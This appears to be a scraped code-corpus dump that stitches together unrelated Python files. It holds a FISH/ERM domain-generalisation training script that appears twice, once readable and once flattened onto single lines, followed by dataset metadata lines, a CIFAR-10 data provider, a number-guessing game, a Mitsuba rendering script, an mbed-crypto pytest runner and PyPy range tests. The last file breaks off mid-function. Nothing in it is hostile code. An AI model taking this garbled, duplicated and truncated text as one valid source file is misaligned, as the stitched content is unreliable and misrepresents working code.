parser.add_argument('--data-dir', type=str,
                    help='path to data dir')
parser.add_argument('--stratified', action='store_true', default=False,
                    help='whether to use stratified sampling for classes')
parser.add_argument('--num-domains', type=int, default=15,
                    help='Number of domains, only specify for cdsprites')
# Computation
parser.add_argument('--no-cuda', action='store_true', default=False,
                    help='disables CUDA use')
parser.add_argument('--seed', type=int, default=-1,
                    help='random seed, set as -1 for random.')

args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device("cuda" if args.cuda else "cpu")

# Merge CLI arguments with the per-dataset defaults from config.py.
args_dict = args.__dict__
args_dict.update(dataset_defaults[args.dataset])
args = argparse.Namespace(**args_dict)

# Choosing and saving a random seed for reproducibility
if args.seed == -1:
    args.seed = int(torch.randint(0, 2 ** 32 - 1, (1,)).item())
torch.manual_seed(args.seed)
np.random.seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
# NOTE(review): torch.manual_seed was already called above; this second
# call is redundant but harmless.
torch.manual_seed(args.seed)
torch.backends.cudnn.deterministic = True

# experiment directory setup
args.experiment = f"{args.dataset}_{args.algorithm}" \
    if args.experiment == '.' else args.experiment
directory_name = '../experiments/{}'.format(args.experiment)
if not os.path.exists(directory_name):
    os.makedirs(directory_name)
runPath = mkdtemp(prefix=runId, dir=directory_name)

# logging setup
sys.stdout = Logger('{}/run.log'.format(runPath))
print('RunID:' + runPath)
with open('{}/args.json'.format(runPath), 'w') as fp:
    json.dump(args.__dict__, fp)
torch.save(args, '{}/args.rar'.format(runPath))

# load model
modelC = getattr(models, args.dataset)
train_loader, tv_loaders = modelC.getDataLoaders(args, device=device)
val_loader, test_loader = tv_loaders['val'], tv_loaders['test']
model = modelC(args, weights=None).to(device)

assert args.optimiser in ['SGD', 'Adam'], "Invalid choice of optimiser, choose between 'Adam' and 'SGD'"
opt = getattr(optim, args.optimiser)
optimiserC = opt(model.parameters(), **args.optimiser_args)
predict_fn, criterion = return_predict_fn(args.dataset), return_criterion(args.dataset)


def pretrain(train_loader, pretrain_iters):
    """Warm-start the global model with `pretrain_iters` plain ERM updates.

    Tracks validation performance in a local aggregator, keeps the best
    checkpoint on disk, and finally reloads that best checkpoint into the
    global `model` before FISH training begins.
    """
    aggP = defaultdict(list)
    aggP['val_stat'] = [0.]

    n_iters = 0
    pretrain_epochs = int(np.ceil(pretrain_iters/len(train_loader)))
    pbar = tqdm.tqdm(total = pretrain_iters)
    for epoch in range(pretrain_epochs):
        for i, data in enumerate(train_loader):
            model.train()
            # get the inputs
            x, y = unpack_data(data, device)
            optimiserC.zero_grad()
            y_hat = model(x)
            loss = criterion(y_hat, y)
            loss.backward()
            optimiserC.step()
            n_iters += 1
            # display progress
            pbar.set_description(f"Pretrain {n_iters}/{pretrain_iters} iters")
            pbar.update(1)

            if (i + 1) % args.print_iters == 0 and args.print_iters != -1:
                test(val_loader, aggP, loader_type='val', verbose=False)
                test(test_loader, aggP, loader_type='test', verbose=False)
                save_best_model(model, runPath, aggP, args)
            if n_iters == pretrain_iters:
                test(val_loader, aggP, loader_type='val', verbose=False)
                test(test_loader, aggP, loader_type='test', verbose=False)
                save_best_model(model, runPath, aggP, args)
                # NOTE(review): break only exits the inner loop; correct here
                # because pretrain_epochs is the ceiling of
                # pretrain_iters / len(train_loader), so this fires in the
                # final epoch.
                break
    pbar.close()
    model.load_state_dict(torch.load(runPath + '/model.rar'))
    print('Finished ERM pre-training!')


def train_erm(train_loader, epoch, agg):
    """Run one epoch of standard empirical-risk-minimisation training.

    Periodically (every `args.print_iters` steps, unless the algorithm is
    'fish') logs the running loss into `agg`, evaluates on the val/test
    loaders and checkpoints the best model.
    """
    running_loss = 0
    total_iters = len(train_loader)
    print('\n====> Epoch: {:03d} '.format(epoch))
    for i, data in enumerate(train_loader):
        model.train()
        # get the inputs
        x, y = unpack_data(data, device)
        optimiserC.zero_grad()
        y_hat = model(x)
        loss = criterion(y_hat, y)
        loss.backward()
        optimiserC.step()
        running_loss += loss.item()
        # print statistics
        if (i + 1) % args.print_iters == 0 and args.print_iters != -1 and args.algorithm != 'fish':
            agg['train_loss'].append(running_loss / args.print_iters)
            agg['train_iters'].append(i+1+epoch*total_iters)
            print('iteration {:05d}/{:d}: loss: {:6.3f}'.format(i + 1, total_iters, running_loss / args.print_iters))
            test(val_loader, agg, loader_type='val')
            test(test_loader, agg, loader_type='test')
            running_loss = 0.0
            save_best_model(model, runPath, agg, args)


def train_fish(train_loader, epoch, agg):
    """Run one epoch of FISH (gradient-matching) training.

    Repeatedly samples `args.meta_steps` domains, takes sequential inner
    updates on a deep copy of the model, then moves the global weights a
    fraction `meta_lr / meta_steps` towards the inner-loop result via
    `fish_step`.  Stops when fewer than `meta_steps` domains still have
    more than one batch left.
    """
    model.train()
    train_loader.dataset.reset_batch()
    i = 0
    print('\n====> Epoch: {:03d} '.format(epoch))
    opt_inner_pre = None
    while sum([l > 1 for l in train_loader.dataset.batches_left.values()]) >= args.meta_steps:
        i += 1
        # sample `meta_steps` number of domains to use for the inner loop
        domains = sample_domains(train_loader, args.meta_steps, args.stratified).tolist()
        # prepare model for inner loop update
        model_inner = copy.deepcopy(model)
        model_inner.train()
        opt_inner = opt(model_inner.parameters(), **args.optimiser_args)
        if opt_inner_pre is not None and args.reload_inner_optim:
            opt_inner.load_state_dict(opt_inner_pre)
        # inner loop update
        for domain in domains:
            data = train_loader.dataset.get_batch(domain)
            x, y = unpack_data(data, device)
            opt_inner.zero_grad()
            y_hat = model_inner(x)
            loss = criterion(y_hat, y)
            loss.backward()
            opt_inner.step()
        opt_inner_pre = opt_inner.state_dict()
        # fish update
        meta_weights = fish_step(meta_weights=model.state_dict(),
                                 inner_weights=model_inner.state_dict(),
                                 meta_lr=args.meta_lr / args.meta_steps)
        model.reset_weights(meta_weights)
        # log the number of batches left for each domain
        for domain in domains:
            train_loader.dataset.batches_left[domain] = \
                train_loader.dataset.batches_left[domain] - 1 \
                if train_loader.dataset.batches_left[domain] > 1 else 1

        if (i + 1) % args.print_iters == 0 and args.print_iters != -1:
            print(f'iteration {(i + 1):05d}: ')
            test(val_loader, agg, loader_type='val')
            test(test_loader, agg, loader_type='test')
            model.train()
            save_best_model(model, runPath, agg, args)


def test(test_loader, agg, loader_type='test', verbose=True, save_ypred=False):
    """Evaluate the global model on `test_loader`.

    Appends the selection metric to `agg[f'{loader_type}_stat']`.  With
    `save_ypred=True`, also writes the raw predictions to a CSV named after
    the dataset/split (poverty encodes the fold letter instead of the seed).
    """
    model.eval()
    yhats, ys, metas = [], [], []
    with torch.no_grad():
        for i, (x, y, meta) in enumerate(test_loader):
            # get the inputs
            x, y = x.to(device), y.to(device)
            y_hat = model(x)
            ys.append(y)
            yhats.append(y_hat)
            metas.append(meta)
        ypreds, ys, metas = predict_fn(torch.cat(yhats)), torch.cat(ys), torch.cat(metas)
        if save_ypred:
            if args.dataset == 'poverty':
                save_name = f"{args.dataset}_split:{loader_type}_fold:" \
                            f"{['A', 'B', 'C', 'D', 'E'][args.seed]}" \
                            f"_epoch:best_pred.csv"
            else:
                save_name = f"{args.dataset}_split:{loader_type}_seed:" \
                            f"{args.seed}_epoch:best_pred.csv"
            with open(f"{runPath}/{save_name}", 'w') as f:
                writer = csv.writer(f)
                writer.writerows(ypreds.unsqueeze(1).cpu().tolist())
        test_val = test_loader.dataset.eval(ypreds.cpu(), ys.cpu(), metas)
        agg[f'{loader_type}_stat'].append(test_val[0][args.selection_metric])
        if verbose:
            print(f"=============== {loader_type} ===============\n{test_val[-1]}")


if __name__ == '__main__':
    # Optional ERM warm-start before FISH training.
    if args.algorithm == 'fish' and args.pretrain_iters != 0:
        print("="*30 + "ERM pretrain" + "="*30)
        pretrain(train_loader, args.pretrain_iters)

    # Dispatch to train_erm or train_fish based on the CLI flag.
    print("="*30 + f"Training: {args.algorithm}" + "="*30)
    train = locals()[f'train_{args.algorithm}']
    agg = defaultdict(list)
    agg['val_stat'] = [0.]

    for epoch in range(args.epochs):
        train(train_loader, epoch, agg)
        test(val_loader, agg, loader_type='val')
        test(test_loader, agg, loader_type='test')
        save_best_model(model, runPath, agg, args)
    # Reload the best checkpoint and dump predictions for every split.
    model.load_state_dict(torch.load(runPath + '/model.rar'))
    print('Finished training! Loading best model...')
    for split, loader in tv_loaders.items():
        test(loader, agg, loader_type=split, save_ypred=True)
import copy import argparse import datetime import json import os import sys import csv import tqdm from collections import defaultdict from tempfile import mkdtemp import numpy as np import torch import torch.optim as optim import models from config import dataset_defaults from utils import unpack_data, sample_domains, save_best_model, \ Logger, return_predict_fn, return_criterion, fish_step runId = datetime.datetime.now().isoformat().replace(':', '_') torch.backends.cudnn.benchmark = True parser = argparse.ArgumentParser(description='Gradient Matching for Domain Generalization.') # General parser.add_argument('--dataset', type=str, help="Name of dataset, choose from amazon, camelyon, " "cdsprites, civil, fmow, iwildcam, poverty") parser.add_argument('--algorithm', type=str, help='training scheme, choose between fish or erm.') parser.add_argument('--experiment', type=str, default='.', help='experiment name, set as . for automatic naming.') parser.add_argument('--data-dir', type=str, help='path to data dir') parser.add_argument('--stratified', action='store_true', default=False, help='whether to use stratified sampling for classes') parser.add_argument('--num-domains', type=int, default=15, help='Number of domains, only specify for cdsprites') # Computation parser.add_argument('--no-cuda', action='store_true', default=False, help='disables CUDA use') parser.add_argument('--seed', type=int, default=-1, help='random seed, set as -1 for random.') args = parser.parse_args() args.cuda = not args.no_cuda and torch.cuda.is_available() device = torch.device("cuda" if args.cuda else "cpu") args_dict = args.__dict__ args_dict.update(dataset_defaults[args.dataset]) args = argparse.Namespace(**args_dict) # Choosing and saving a random seed for reproducibility if args.seed == -1: args.seed = int(torch.randint(0, 2 ** 32 - 1, (1,)).item()) torch.manual_seed(args.seed) np.random.seed(args.seed) torch.cuda.manual_seed_all(args.seed) torch.manual_seed(args.seed) 
torch.backends.cudnn.deterministic = True # experiment directory setup args.experiment = f"{args.dataset}_{args.algorithm}" \ if args.experiment == '.' else args.experiment directory_name = '../experiments/{}'.format(args.experiment) if not os.path.exists(directory_name): os.makedirs(directory_name) runPath = mkdtemp(prefix=runId, dir=directory_name) # logging setup sys.stdout = Logger('{}/run.log'.format(runPath)) print('RunID:' + runPath) with open('{}/args.json'.format(runPath), 'w') as fp: json.dump(args.__dict__, fp) torch.save(args, '{}/args.rar'.format(runPath)) # load model modelC = getattr(models, args.dataset) train_loader, tv_loaders = modelC.getDataLoaders(args, device=device) val_loader, test_loader = tv_loaders['val'], tv_loaders['test'] model = modelC(args, weights=None).to(device) assert args.optimiser in ['SGD', 'Adam'], "Invalid choice of optimiser, choose between 'Adam' and 'SGD'" opt = getattr(optim, args.optimiser) optimiserC = opt(model.parameters(), **args.optimiser_args) predict_fn, criterion = return_predict_fn(args.dataset), return_criterion(args.dataset) def pretrain(train_loader, pretrain_iters): aggP = defaultdict(list) aggP['val_stat'] = [0.] 
n_iters = 0 pretrain_epochs = int(np.ceil(pretrain_iters/len(train_loader))) pbar = tqdm.tqdm(total = pretrain_iters) for epoch in range(pretrain_epochs): for i, data in enumerate(train_loader): model.train() # get the inputs x, y = unpack_data(data, device) optimiserC.zero_grad() y_hat = model(x) loss = criterion(y_hat, y) loss.backward() optimiserC.step() n_iters += 1 # display progress pbar.set_description(f"Pretrain {n_iters}/{pretrain_iters} iters") pbar.update(1) if (i + 1) % args.print_iters == 0 and args.print_iters != -1: test(val_loader, aggP, loader_type='val', verbose=False) test(test_loader, aggP, loader_type='test', verbose=False) save_best_model(model, runPath, aggP, args) if n_iters == pretrain_iters: test(val_loader, aggP, loader_type='val', verbose=False) test(test_loader, aggP, loader_type='test', verbose=False) save_best_model(model, runPath, aggP, args) break pbar.close() model.load_state_dict(torch.load(runPath + '/model.rar')) print('Finished ERM pre-training!') def train_erm(train_loader, epoch, agg): running_loss = 0 total_iters = len(train_loader) print('\n====> Epoch: {:03d} '.format(epoch)) for i, data in enumerate(train_loader): model.train() # get the inputs x, y = unpack_data(data, device) optimiserC.zero_grad() y_hat = model(x) loss = criterion(y_hat, y) loss.backward() optimiserC.step() running_loss += loss.item() # print statistics if (i + 1) % args.print_iters == 0 and args.print_iters != -1 and args.algorithm != 'fish': agg['train_loss'].append(running_loss / args.print_iters) agg['train_iters'].append(i+1+epoch*total_iters) print('iteration {:05d}/{:d}: loss: {:6.3f}'.format(i + 1, total_iters, running_loss / args.print_iters)) test(val_loader, agg, loader_type='val') test(test_loader, agg, loader_type='test') running_loss = 0.0 save_best_model(model, runPath, agg, args) def train_fish(train_loader, epoch, agg): model.train() train_loader.dataset.reset_batch() i = 0 print('\n====> Epoch: {:03d} '.format(epoch)) opt_inner_pre = 
None while sum([l > 1 for l in train_loader.dataset.batches_left.values()]) >= args.meta_steps: i += 1 # sample `meta_steps` number of domains to use for the inner loop domains = sample_domains(train_loader, args.meta_steps, args.stratified).tolist() # prepare model for inner loop update model_inner = copy.deepcopy(model) model_inner.train() opt_inner = opt(model_inner.parameters(), **args.optimiser_args) if opt_inner_pre is not None and args.reload_inner_optim: opt_inner.load_state_dict(opt_inner_pre) # inner loop update for domain in domains: data = train_loader.dataset.get_batch(domain) x, y = unpack_data(data, device) opt_inner.zero_grad() y_hat = model_inner(x) loss = criterion(y_hat, y) loss.backward() opt_inner.step() opt_inner_pre = opt_inner.state_dict() # fish update meta_weights = fish_step(meta_weights=model.state_dict(), inner_weights=model_inner.state_dict(), meta_lr=args.meta_lr / args.meta_steps) model.reset_weights(meta_weights) # log the number of batches left for each domain for domain in domains: train_loader.dataset.batches_left[domain] = \ train_loader.dataset.batches_left[domain] - 1 \ if train_loader.dataset.batches_left[domain] > 1 else 1 if (i + 1) % args.print_iters == 0 and args.print_iters != -1: print(f'iteration {(i + 1):05d}: ') test(val_loader, agg, loader_type='val') test(test_loader, agg, loader_type='test') model.train() save_best_model(model, runPath, agg, args) def test(test_loader, agg, loader_type='test', verbose=True, save_ypred=False): model.eval() yhats, ys, metas = [], [], [] with torch.no_grad(): for i, (x, y, meta) in enumerate(test_loader): # get the inputs x, y = x.to(device), y.to(device) y_hat = model(x) ys.append(y) yhats.append(y_hat) metas.append(meta) ypreds, ys, metas = predict_fn(torch.cat(yhats)), torch.cat(ys), torch.cat(metas) if save_ypred: if args.dataset == 'poverty': save_name = f"{args.dataset}_split:{loader_type}_fold:" \ f"{['A', 'B', 'C', 'D', 'E'][args.seed]}" \ f"_epoch:best_pred.csv" else: 
save_name = f"{args.dataset}_split:{loader_type}_seed:" \ f"{args.seed}_epoch:best_pred.csv" with open(f"{runPath}/{save_name}", 'w') as f: writer = csv.writer(f) writer.writerows(ypreds.unsqueeze(1).cpu().tolist()) test_val = test_loader.dataset.eval(ypreds.cpu(), ys.cpu(), metas) agg[f'{loader_type}_stat'].append(test_val[0][args.selection_metric]) if verbose: print(f"=============== {loader_type} ===============\n{test_val[-1]}") if __name__ == '__main__': if args.algorithm == 'fish' and args.pretrain_iters != 0: print("="*30 + "ERM pretrain" + "="*30) pretrain(train_loader, args.pretrain_iters) print("="*30 + f"Training: {args.algorithm}" + "="*30) train = locals()[f'train_{args.algorithm}'] agg = defaultdict(list) agg['val_stat'] = [0.] for epoch in range(args.epochs): train(train_loader, epoch, agg) test(val_loader, agg, loader_type='val') test(test_loader, agg, loader_type='test') save_best_model(model, runPath, agg, args) model.load_state_dict(torch.load(runPath + '/model.rar')) print('Finished training! Loading best model...') for split, loader in tv_loaders.items(): test(loader, agg, loader_type=split, save_ypred=True)
en
0.601689
# General # Computation # Choosing and saving a random seed for reproducibility # experiment directory setup # logging setup # load model # get the inputs # display progress # get the inputs # print statistics # sample `meta_steps` number of domains to use for the inner loop # prepare model for inner loop update # inner loop update # fish update # log the number of batches left for each domain # get the inputs
1.924963
2
tfplus/data/cifar10.py
renmengye/tfplus
2
6618615
<filename>tfplus/data/cifar10.py from __future__ import division import cPickle as pkl import numpy as np import os import tfplus tfplus.cmd_args.add('cifar10:dataset_folder', 'str', '/ais/gobi4/mren/data/cifar10') class CIFAR10DataProvider(tfplus.data.data_provider.DataProvider): """ x: First divide by 255, then substract pixel mean. """ def __init__(self, split='train', filename=None): super(CIFAR10DataProvider, self).__init__() self.log = tfplus.utils.logger.get() if split is None: self.split = 'train' else: self.split = split self.log.info('Data split: {}'.format(self.split)) self.filename = filename self._images = None self._labels = None self.register_option('cifar10:dataset_folder') pass def init_data(self): if self.split == 'train': self._images = np.zeros([50000, 32, 32, 3], dtype='uint8') self._labels = np.zeros([50000], dtype='int') for batch in xrange(5): fname = os.path.join(self.get_option( 'cifar10:dataset_folder'), 'data_batch_{}'.format( batch + 1)) start = batch * 10000 end = (batch + 1) * 10000 with open(fname, 'rb') as fo: _data = pkl.load(fo) self._images[start: end] = _data['data'].reshape( [10000, 3, 32, 32]).transpose([0, 2, 3, 1]) self._labels[start: end] = np.array(_data['labels']) elif self.split == 'test': fname = os.path.join(self.get_option( 'cifar10:dataset_folder'), 'test_batch') with open(fname, 'rb') as fo: _data = pkl.load(fo) self._images = _data['data'].reshape( [10000, 3, 32, 32]).transpose([0, 2, 3, 1]) self._labels = np.array(_data['labels']) pass else: raise Exception('Unknown split: {}'.format(self.split)) # self._images = (self._images / 255).astype('float32') self._images = self._images.astype('float32') if self.split == 'train': self._pixel_mean = self._images.mean(axis=0) else: _images = np.zeros([50000, 32, 32, 3], dtype='uint8') for batch in xrange(5): fname = os.path.join(self.get_option( 'cifar10:dataset_folder'), 'data_batch_{}'.format( batch + 1)) start = batch * 10000 end = (batch + 1) * 10000 with open(fname, 
'rb') as fo: _data = pkl.load(fo) _images[start: end] = _data['data'].reshape( [10000, 3, 32, 32]).transpose([0, 2, 3, 1]) # self._pixel_mean = (_images / 255).astype('float32').mean(axis=0) self._pixel_mean = _images.astype('float32').mean(axis=0) _images = None self._images = self._images - self._pixel_mean # self._images = self._images / 255 pass def get_size(self): if self.split == 'train': return 50000 elif self.split == 'test': return 10000 else: raise Exception('Unknown split {}'.format(self.split)) def get_batch_idx(self, idx, **kwargs): if self._images is None: self.init_data() labels = self._labels[idx] y_gt = np.zeros([len(idx), 10], dtype='float32') y_gt[np.arange(len(idx)), labels] = 1.0 results = { 'x': self._images[idx], 'y_gt': y_gt } return results tfplus.data.data_provider.get_factory().register('cifar10', CIFAR10DataProvider) if __name__ == '__main__': print tfplus.data.data_provider.create_from_main('cifar10').get_batch( np.arange(5)) pass
<filename>tfplus/data/cifar10.py from __future__ import division import cPickle as pkl import numpy as np import os import tfplus tfplus.cmd_args.add('cifar10:dataset_folder', 'str', '/ais/gobi4/mren/data/cifar10') class CIFAR10DataProvider(tfplus.data.data_provider.DataProvider): """ x: First divide by 255, then substract pixel mean. """ def __init__(self, split='train', filename=None): super(CIFAR10DataProvider, self).__init__() self.log = tfplus.utils.logger.get() if split is None: self.split = 'train' else: self.split = split self.log.info('Data split: {}'.format(self.split)) self.filename = filename self._images = None self._labels = None self.register_option('cifar10:dataset_folder') pass def init_data(self): if self.split == 'train': self._images = np.zeros([50000, 32, 32, 3], dtype='uint8') self._labels = np.zeros([50000], dtype='int') for batch in xrange(5): fname = os.path.join(self.get_option( 'cifar10:dataset_folder'), 'data_batch_{}'.format( batch + 1)) start = batch * 10000 end = (batch + 1) * 10000 with open(fname, 'rb') as fo: _data = pkl.load(fo) self._images[start: end] = _data['data'].reshape( [10000, 3, 32, 32]).transpose([0, 2, 3, 1]) self._labels[start: end] = np.array(_data['labels']) elif self.split == 'test': fname = os.path.join(self.get_option( 'cifar10:dataset_folder'), 'test_batch') with open(fname, 'rb') as fo: _data = pkl.load(fo) self._images = _data['data'].reshape( [10000, 3, 32, 32]).transpose([0, 2, 3, 1]) self._labels = np.array(_data['labels']) pass else: raise Exception('Unknown split: {}'.format(self.split)) # self._images = (self._images / 255).astype('float32') self._images = self._images.astype('float32') if self.split == 'train': self._pixel_mean = self._images.mean(axis=0) else: _images = np.zeros([50000, 32, 32, 3], dtype='uint8') for batch in xrange(5): fname = os.path.join(self.get_option( 'cifar10:dataset_folder'), 'data_batch_{}'.format( batch + 1)) start = batch * 10000 end = (batch + 1) * 10000 with open(fname, 
'rb') as fo: _data = pkl.load(fo) _images[start: end] = _data['data'].reshape( [10000, 3, 32, 32]).transpose([0, 2, 3, 1]) # self._pixel_mean = (_images / 255).astype('float32').mean(axis=0) self._pixel_mean = _images.astype('float32').mean(axis=0) _images = None self._images = self._images - self._pixel_mean # self._images = self._images / 255 pass def get_size(self): if self.split == 'train': return 50000 elif self.split == 'test': return 10000 else: raise Exception('Unknown split {}'.format(self.split)) def get_batch_idx(self, idx, **kwargs): if self._images is None: self.init_data() labels = self._labels[idx] y_gt = np.zeros([len(idx), 10], dtype='float32') y_gt[np.arange(len(idx)), labels] = 1.0 results = { 'x': self._images[idx], 'y_gt': y_gt } return results tfplus.data.data_provider.get_factory().register('cifar10', CIFAR10DataProvider) if __name__ == '__main__': print tfplus.data.data_provider.create_from_main('cifar10').get_batch( np.arange(5)) pass
en
0.533335
x: First divide by 255, then substract pixel mean. # self._images = (self._images / 255).astype('float32') # self._pixel_mean = (_images / 255).astype('float32').mean(axis=0) # self._images = self._images / 255
2.499104
2
mine/2.py
YueFangOfficial/python-jumpstart-course-entry
0
6618616
import random num = random.randint(0, 100) text = -1 while (text != num): text = int(input("Guess a number between 0 and 100: ")) if (text > num): print("Sorry but {} is HIGHER than the number".format(text)) elif (text < num): print("Sorry but {} is LOWER than the number".format(text)) print("YES! You've got it! The number is {}".format(text))
import random num = random.randint(0, 100) text = -1 while (text != num): text = int(input("Guess a number between 0 and 100: ")) if (text > num): print("Sorry but {} is HIGHER than the number".format(text)) elif (text < num): print("Sorry but {} is LOWER than the number".format(text)) print("YES! You've got it! The number is {}".format(text))
none
1
4.061827
4
utils/mitsuba_python.py
yikaiw/EIP
28
6618617
<reponame>yikaiw/EIP import os, sys sys.path.append('/Applications/Mitsuba.app/python/2.7') os.environ['PATH'] = 'path-to-mitsuba-directory' + os.pathsep + os.environ['PATH'] import mitsuba from mitsuba.core import * from mitsuba.render import SceneHandler from mitsuba.render import RenderQueue, RenderJob import multiprocessing data_dir = '/Users/home/Documents/works/deformable-objects/outputs/can_tactile/' target_dir = '/Users/home/Documents/works/deformable-objects/outputs/can_tactile/render0' # os.makedirs(target_dir, exist_ok=True) fileResolver = Thread.getThread().getFileResolver() fileResolver.appendPath(data_dir) paramMap = StringMap() paramMap['myParameter'] = 'value' scheduler = Scheduler.getInstance() for i in range(0, multiprocessing.cpu_count()): scheduler.registerWorker(LocalWorker(i, 'wrk%i' % i)) scheduler.start() for idx in range(7, 107): print('idx ' + str(idx)) f = open(os.path.join(data_dir, 'can_origin.xml'), 'r') content = f.read() content = content.replace('elastic_voxel', '%d_elastic_voxel' % idx) w = open(os.path.join(data_dir, 'can.xml'), 'w') w.write(content) f.close() w.close() scene = SceneHandler.loadScene(fileResolver.resolve('can.xml'), paramMap) queue = RenderQueue() scene.setDestinationFile(os.path.join(target_dir, 'renderedResult' + str(idx))) job = RenderJob('myRenderJob' + str(idx), scene, queue) job.start() queue.waitLeft(0) queue.join() # print(Statistics.getInstance().getStats())
import os, sys sys.path.append('/Applications/Mitsuba.app/python/2.7') os.environ['PATH'] = 'path-to-mitsuba-directory' + os.pathsep + os.environ['PATH'] import mitsuba from mitsuba.core import * from mitsuba.render import SceneHandler from mitsuba.render import RenderQueue, RenderJob import multiprocessing data_dir = '/Users/home/Documents/works/deformable-objects/outputs/can_tactile/' target_dir = '/Users/home/Documents/works/deformable-objects/outputs/can_tactile/render0' # os.makedirs(target_dir, exist_ok=True) fileResolver = Thread.getThread().getFileResolver() fileResolver.appendPath(data_dir) paramMap = StringMap() paramMap['myParameter'] = 'value' scheduler = Scheduler.getInstance() for i in range(0, multiprocessing.cpu_count()): scheduler.registerWorker(LocalWorker(i, 'wrk%i' % i)) scheduler.start() for idx in range(7, 107): print('idx ' + str(idx)) f = open(os.path.join(data_dir, 'can_origin.xml'), 'r') content = f.read() content = content.replace('elastic_voxel', '%d_elastic_voxel' % idx) w = open(os.path.join(data_dir, 'can.xml'), 'w') w.write(content) f.close() w.close() scene = SceneHandler.loadScene(fileResolver.resolve('can.xml'), paramMap) queue = RenderQueue() scene.setDestinationFile(os.path.join(target_dir, 'renderedResult' + str(idx))) job = RenderJob('myRenderJob' + str(idx), scene, queue) job.start() queue.waitLeft(0) queue.join() # print(Statistics.getInstance().getStats())
ru
0.09618
# os.makedirs(target_dir, exist_ok=True) # print(Statistics.getInstance().getStats())
1.950033
2
mbl-core/tests/libs/mbed-crypto/test_mbed-crypto.py
edmund-troche/mbl-core
5
6618618
#!/usr/bin/env python3 # Copyright (c) 2019 Arm Limited and Contributors. All rights reserved. # # SPDX-License-Identifier: BSD-3-Clause """Pytest for testing the mbed-crypto library. The actual tests should already be on the target, this script just runs them. """ import os import logging import pathlib import pytest import subprocess TESTS_PATH = pathlib.Path("/usr/lib/mbed-crypto/test") # For each test binary there is a corresponding ".datax" file. Enumerate # the datax files then remove the ".datax" suffix to get a list of tests. # convert the Paths to strings because that's what pytest.mark.parametrize # expects for test IDs. TESTS = [str(path.stem) for path in TESTS_PATH.glob("*.datax")] def test_mbed_crypto_tests_exist(): """Check that the test binaries are on the target""" assert TESTS @pytest.mark.parametrize("test", TESTS, ids=TESTS) def test_mbed_crypto(test): """Run a test binary on the target""" result = subprocess.run( [TESTS_PATH / test], check=False, cwd=TESTS_PATH, capture_output=True, text=True, ) if result.returncode != 0: logging.getLogger().error(result.stdout) assert result.returncode == 0
#!/usr/bin/env python3 # Copyright (c) 2019 Arm Limited and Contributors. All rights reserved. # # SPDX-License-Identifier: BSD-3-Clause """Pytest for testing the mbed-crypto library. The actual tests should already be on the target, this script just runs them. """ import os import logging import pathlib import pytest import subprocess TESTS_PATH = pathlib.Path("/usr/lib/mbed-crypto/test") # For each test binary there is a corresponding ".datax" file. Enumerate # the datax files then remove the ".datax" suffix to get a list of tests. # convert the Paths to strings because that's what pytest.mark.parametrize # expects for test IDs. TESTS = [str(path.stem) for path in TESTS_PATH.glob("*.datax")] def test_mbed_crypto_tests_exist(): """Check that the test binaries are on the target""" assert TESTS @pytest.mark.parametrize("test", TESTS, ids=TESTS) def test_mbed_crypto(test): """Run a test binary on the target""" result = subprocess.run( [TESTS_PATH / test], check=False, cwd=TESTS_PATH, capture_output=True, text=True, ) if result.returncode != 0: logging.getLogger().error(result.stdout) assert result.returncode == 0
en
0.743034
#!/usr/bin/env python3 # Copyright (c) 2019 Arm Limited and Contributors. All rights reserved. # # SPDX-License-Identifier: BSD-3-Clause Pytest for testing the mbed-crypto library. The actual tests should already be on the target, this script just runs them. # For each test binary there is a corresponding ".datax" file. Enumerate # the datax files then remove the ".datax" suffix to get a list of tests. # convert the Paths to strings because that's what pytest.mark.parametrize # expects for test IDs. Check that the test binaries are on the target Run a test binary on the target
2.203203
2
pypy/module/__builtin__/test/test_range.py
camillobruni/pygirl
12
6618619
import autopath class AppTestRange: def test_range_toofew(self): raises(TypeError, range) def test_range_toomany(self): raises(TypeError, range, 1, 2, 3, 4) def test_range_one(self): assert range(1) == [0] def test_range_posstartisstop(self): assert range(1, 1) == [] def test_range_negstartisstop(self): assert range(-1, -1) == [] def test_range_zero(self): assert range(0) == [] def test_range_twoargs(self): assert range(1, 2) == [1] def test_range_decreasingtwoargs(self): assert range(3, 1) == [] def test_range_negatives(self): assert range(-3) == [] def test_range_decreasing_negativestep(self): assert range(5, -2, -1) == [5, 4, 3, 2, 1, 0 , -1] def test_range_posfencepost1(self): assert range (1, 10, 3) == [1, 4, 7] def test_range_posfencepost2(self): assert range (1, 11, 3) == [1, 4, 7, 10] def test_range_posfencepost3(self): assert range (1, 12, 3) == [1, 4, 7, 10] def test_range_negfencepost1(self): assert range (-1, -10, -3) == [-1, -4, -7] def test_range_negfencepost2(self): assert range (-1, -11, -3) == [-1, -4, -7, -10] def test_range_negfencepost3(self): assert range (-1, -12, -3) == [-1, -4, -7, -10] def test_range_decreasing_negativelargestep(self): assert range(5, -2, -3) == [5, 2, -1] def test_range_increasing_positivelargestep(self): assert range(-5, 2, 3) == [-5, -2, 1] def test_range_zerostep(self): raises(ValueError, range, 1, 5, 0) def DONT_test_range_float(self): "How CPython does it - UGLY, ignored for now." assert range(0.1, 2.0, 1.1) == [0, 1] def test_range_wrong_type(self): raises(TypeError, range, "42")
import autopath class AppTestRange: def test_range_toofew(self): raises(TypeError, range) def test_range_toomany(self): raises(TypeError, range, 1, 2, 3, 4) def test_range_one(self): assert range(1) == [0] def test_range_posstartisstop(self): assert range(1, 1) == [] def test_range_negstartisstop(self): assert range(-1, -1) == [] def test_range_zero(self): assert range(0) == [] def test_range_twoargs(self): assert range(1, 2) == [1] def test_range_decreasingtwoargs(self): assert range(3, 1) == [] def test_range_negatives(self): assert range(-3) == [] def test_range_decreasing_negativestep(self): assert range(5, -2, -1) == [5, 4, 3, 2, 1, 0 , -1] def test_range_posfencepost1(self): assert range (1, 10, 3) == [1, 4, 7] def test_range_posfencepost2(self): assert range (1, 11, 3) == [1, 4, 7, 10] def test_range_posfencepost3(self): assert range (1, 12, 3) == [1, 4, 7, 10] def test_range_negfencepost1(self): assert range (-1, -10, -3) == [-1, -4, -7] def test_range_negfencepost2(self): assert range (-1, -11, -3) == [-1, -4, -7, -10] def test_range_negfencepost3(self): assert range (-1, -12, -3) == [-1, -4, -7, -10] def test_range_decreasing_negativelargestep(self): assert range(5, -2, -3) == [5, 2, -1] def test_range_increasing_positivelargestep(self): assert range(-5, 2, 3) == [-5, -2, 1] def test_range_zerostep(self): raises(ValueError, range, 1, 5, 0) def DONT_test_range_float(self): "How CPython does it - UGLY, ignored for now." assert range(0.1, 2.0, 1.1) == [0, 1] def test_range_wrong_type(self): 